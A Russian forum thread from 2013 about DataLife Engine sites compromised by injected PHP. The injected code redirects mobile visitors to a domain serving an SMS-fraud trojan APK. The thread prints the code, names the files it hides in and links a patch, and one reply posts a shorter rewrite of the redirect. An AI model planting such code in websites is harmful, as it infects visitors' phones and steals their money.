Добрый вечер, Гость! Представляем Вам наши форумы. Вы можете зарегистрироваться чтобы писать на форумах или зайдите под своим именем, если Вы уже регистрировались.
   
   

Форум   Пользователи   Календарь   Помощь   Поиск   Новые сообщения   Новые темы   Темы без ответов  

Форум
 Разное / Флейм
         Если у вас есть сайт на Datalife Engine, критическая уязвимость

Похожие темы

Если у вас есть сайт на Datalife Engine, критическая уязвимость

Ссылка на сообщение в теме    Ссылка на страницу сообщения   Жалоба на сообщение  Наверх
События Среда, 16.01.2013, 00:36

Kurman

Группа: Пользователь
Ранг: Продвинутый
Cообщений: 237
Регистрация: 26.10.2009
Город: Moscow
 Троян browser_update_install.apk
В общем, после Нового года, мне 9 января, некоторым 13 января - у кого есть сайты на DLE движке была осуществлена SQL инъекция.

При открытии сайта на компе ничего не происходит, но при заходе с телефона, подгружается browser_update_install.apk - троянец, который впоследствии будет слать с вашего телефона СМС на короткие платные номера, высасывая деньги с счета телефона.

Вот внедренный код:
PHP-код
$iphone strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 

    header('Location: http://domain/');

}


Этот код может быть внедрен в файлы
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Чуть не поседел, пока пару часов судорожно искал причины.. Хорошие люди выложили, хорошо хоть нашел )))

Решение: удалить код, применить патч http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Отредактировано Kurman: 16.01.2013, 00:37:13

Пользователь офлайн
Ссылка на сообщение в теме    Ссылка на страницу сообщения   Жалоба на сообщение  Наверх
События Среда, 16.01.2013, 00:57

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
 А SQL инъекция то тут при чем???Ржу нимагу


Модули, шаблоны и виджеты для SX CMS быстро, не дорого и профессионально
Пользователь офлайн
Ссылка на сообщение в теме    Ссылка на страницу сообщения   Жалоба на сообщение  Наверх
События Среда, 16.01.2013, 01:38

Kurman

Автор текущей темы
Группа: Пользователь
Ранг: Продвинутый
Cообщений: 237
Регистрация: 26.10.2009
Город: Moscow
 Ну доступ в админку сперва получают наверное через инъекцию ))) а потом внедряют код в файлы. ))

Вот подробное описание: http://forum.antichat.ru/showpost.php?p=3344536&postcount=248
Пользователь офлайн
Ссылка на сообщение в теме    Ссылка на страницу сообщения   Жалоба на сообщение  Наверх
События Среда, 16.01.2013, 02:20

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
Цитата
Автор: Kurman
Ну доступ в админку сперва получают наверное через инъекцию ))) а потом внедряют код в файлы. ))

Вот подробное описание: http://forum.antichat.ru/showpost.php?p=3344536&postcount=248


Гораздо проще получить доступ к ftp, чем возится с админкой. А судя по патчу, там вообще php-инъекция была




Модули, шаблоны и виджеты для SX CMS быстро, не дорого и профессионально
Пользователь офлайн
Ссылка на сообщение в теме    Ссылка на страницу сообщения   Жалоба на сообщение  Наверх
События Среда, 16.01.2013, 02:29

SX

Группа: Администратор
Cообщений: 3016
Регистрация: 23.10.2009
 И вообще б я так реализовалРжу нимагу
PHP-код
if (preg_match("/iPhone|Android|webOS|BlackBerry|iPod/i"$_SERVER['HTTP_USER_AGENT'])) header('Location: http://domain/');



Модули, шаблоны и виджеты для SX CMS быстро, не дорого и профессионально
Пользователь офлайн
Ссылка на сообщение в теме    Ссылка на страницу сообщения   Жалоба на сообщение  Наверх
События Среда, 16.01.2013, 22:44

Kurman

Автор текущей темы
Группа: Пользователь
Ранг: Продвинутый
Cообщений: 237
Регистрация: 26.10.2009
Город: Moscow
 : Ржу нимагу Ну, там ещё одна уязвимость была, из-за register_globals=on, наверное ею тоже воспользовались..
Наверное в истории DLE это один из самых больших дыр, которые в нем находили.. Все пока ещё отходят от шока ))

Попробовал предложенный вариант - работает прекрасно Ржу нимагу и код намного меньше и короче Клево
Пользователь офлайн


Похожие темы  |   Предыдущая тема  |   Следующая тема

Быстрый переход:  
 

 Сейчас на сайте

Пользователей: 0, Гостей: 1

Поисковые боты: 201
Bot(183), oBot(10), Googlebot(3), BingBot(4), Crawler
 Статистика форума

  Темы Сообщения Пользователи
За сутки: 0 0 0
За неделю: 0 0 0
За месяц: 0 0 0
Всего: 1444 9453 3409
Мы приветствуем нового участника: wonad81290
 Дни рождения

Михаил Матюнин (46)
Copyright © 2009 - 2024 SX All rights reserved | Powered by SX CMS 1.06 UTF | Контакты